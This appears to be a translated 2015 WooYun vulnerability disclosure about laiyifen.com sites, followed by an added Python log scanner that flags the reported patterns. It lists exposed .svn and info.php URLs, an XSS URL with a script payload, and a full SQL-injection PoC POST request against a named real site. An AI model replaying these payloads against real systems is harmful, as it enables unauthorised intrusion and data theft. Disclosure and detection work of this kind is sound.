
Vulnerability summary

Defect ID: wooyun-2015-0100474

Title: SQL injection and several other security vulnerabilities on a 来伊份 (laiyifen.com) site

Vendor: laiyifen.com

Author: 路人甲

Submitted: 2015-03-10 11:58

Fix time: 2015-03-15 12:00

Disclosed: 2015-03-15 12:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-10: details sent to the vendor, awaiting vendor handling
2015-03-15: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection, cross-site scripting, information disclosure

Detailed description:

Information disclosure (exposed Subversion metadata, .svn/entries):
http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries
http://images.laiyifen.com:80/themes/laiyifen2/images/js/.svn/entries
http://touch.laiyifen.com:80/.svn/entries
http://touch.laiyifen.com:80/media/.svn/entries
http://wx.laiyifen.com:80/.svn/entries
http://wx.laiyifen.com:80/html/pc/images/.svn/entries

L2.png


http://oim.laiyifen.com:80/info.php
http://wx.laiyifen.com/info.php

L1.png


XSS:
http://eip.laiyifen.com/oa/lyf/whln.nsf/myview?openform&count=10&view=vwPubliced%27%27%3E%22%3E%3C/title%3E%3C/textarea%3E%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

xss.png


SQL injection (PoC request):

POST http://laiyifen.com/index.php/product-gnotify.html HTTP/1.1
Host: laiyifen.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.127/secinfo/poc/report.tools.php?act=post&url=http%3A%2F%2Flaiyifen.com%3A80%2Findex.php%2Fproduct-gnotify.html%3Fgoods%255Bnum%255D%3D1%26goods%255Bgoods_id%255D%3D1264%26goods%255Bpmt_id%255D%3D%AB%AB%AB%AB%AB%AB%AB%AB%FE%26goods%255Bproduct_id%255D%3D1373-0
Cookie: 53gid0=52867575601; 53gid1=52867575601; 53gid2=52867575601; visitor_type=old; 53uvid=1; 53kf_72081366_keyword=http%3A%2F%2F192.168.1.127%2Fsecinfo%2Fpoc%2Freport.tools.php%3Fact%3Dpost%26url%3Dhttp%253A%252F%252Flaiyifen.com%253A80%252Findex.php%252Fproduct-gnotify.html%253Fgoods%25255Bnum%25255D%253D1%2526goods%25255Bgoods_id%25255D%253D1264%2526goods%25255Bpmt_id%25255D%253D%25AB%25AB%25AB%25AB%25AB%25AB%25AB%25AB%25FE%2526goods%25255Bproduct_id%25255D%253D1373-0; kf_72081366_keyword_ok=1; onliner_zdfq72081366=0; _ga=GA1.2.159723741.1425868557; Hm_lvt_39275d51dc9886fb63632959ca583081=1425868557,1425868671,1425950675,1425953293; __utma=9760808.159723741.1425868557.1425950675.1425953293.3; __utmz=9760808.1425953293.3.3.utmcsr=192.168.1.127|utmccn=(referral)|utmcmd=referral|utmcct=/secinfo/poc/report.tools.php; acta=%7B%22actn%22%3A%7B%22500223%22%3A%5B%226729838019376085998%3E1%3E1425953204807%3E1%3E1425953204807%3E6720830733351378013%3E1425868468781%22%2C1441505293368%5D%7D%2C%22acti%22%3A%7B%22500223%22%3A%5B%22142586855684636254%22%2C1441420556846%5D%7D%2C%22acts%22%3A%7B%22500223%22%3A%5B%224%3E192.168.1.127%22%2C1441502675632%5D%7D%2C%22actmapping%22%3A%7B%220%22%3A%5B1%2C1428545293374%5D%7D%7D; Hm_lvt_0642ec06b0edd997389083e09f2399fb=1425868557,1425868671,1425950676,1425953293; laiyifen_cookie=536871690.20480.0000; vary=1a7a3797b8098fff6687cf0a7cbb5821f966b1278658678f6c0bb7b3a7dd1b0e; __utmc=9760808; Hm_lpvt_39275d51dc9886fb63632959ca583081=1425953293; Hm_lpvt_0642ec06b0edd997389083e09f2399fb=1425953293; _gat=1; __utmb=9760808.1.10.1425953293; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

goods%5Bnum%5D=1&goods%5Bgoods_id%5D=1264&goods%5Bpmt_id%5D=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&goods%5Bproduct_id%5D=1373-0


1.png
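As an added detection example (not part of the original report or the vendor's code), the following Python flags web access-log lines that match the three exposure patterns reported above: requests for version-control metadata such as .svn/entries, requests for info.php, and request parameters whose percent-decoded bytes are not valid UTF-8 or already contain U+FFFD, as the goods[pmt_id] value does in the PoC request. The log lines are constructed; since access logs do not record POST bodies, the parameter check is shown on the query-string form that appears in the PoC's Referer.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Paths that must never be reachable under a production web root.
VCS_METADATA = re.compile(r"/\.(svn|git|hg|bzr)(/|$)")
PHPINFO_PAGE = re.compile(r"/(info|phpinfo)\.php$", re.IGNORECASE)
# Common log format prefix: client - - [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def suspicious_param_value(raw_value: str) -> bool:
    """True if the percent-encoded value is not valid UTF-8 (raw high bytes such as
    %AB...%FE) or holds U+FFFD (%EF%BF%BD), what those bytes became in the PoC body."""
    try:
        text = unquote_to_bytes(raw_value).decode("utf-8")
    except UnicodeDecodeError:
        return True
    return "\ufffd" in text

def classify(line: str) -> list[str]:
    """Return the exposure patterns one access-log line matches."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    parts = urlsplit(m.group("target"))
    findings = []
    if VCS_METADATA.search(parts.path):
        findings.append("vcs-metadata")
    if PHPINFO_PAGE.search(parts.path):
        findings.append("phpinfo")
    # Only the query string is logged; apply the same check to decoded POST bodies at the app/WAF layer.
    values = (pair.partition("=")[2] for pair in parts.query.split("&") if pair)
    if any(suspicious_param_value(v) for v in values):
        findings.append("invalid-utf8-param")
    return findings

# Constructed sample lines modelled on the URLs and PoC request in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2015:11:40:02 +0800] "GET /themes/laiyifen2/images/css/.svn/entries HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Mar/2015:11:40:03 +0800] "GET /info.php HTTP/1.1" 200 40963',
    '203.0.113.5 - - [10/Mar/2015:11:41:10 +0800] "GET /index.php/product-gnotify.html?goods%5Bnum%5D=1&goods%5Bpmt_id%5D=%AB%AB%FE HTTP/1.1" 500 0',
    '203.0.113.5 - - [10/Mar/2015:11:41:11 +0800] "GET /index.php/product-gnotify.html?goods%5Bpmt_id%5D=%EF%BF%BD%EF%BF%BD HTTP/1.1" 200 0',
    '198.51.100.9 - - [10/Mar/2015:11:42:00 +0800] "GET /index.php/product-1264.html HTTP/1.1" 200 8812',
]

def scan(lines: list[str]) -> dict[str, list[str]]:
    # Map each flagged line to its findings; clean lines are omitted.
    return {line: f for line in lines if (f := classify(line))}

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG).items():
        print(", ".join(findings).ljust(20), line.split('"')[1])
```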


Database:

2.png

Proof of vulnerability:

See above.

Remediation:

Copyright notice: credit 路人甲@乌云 as the source when reposting.


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-03-15 12:00

Vendor reply:

Latest status:

None yet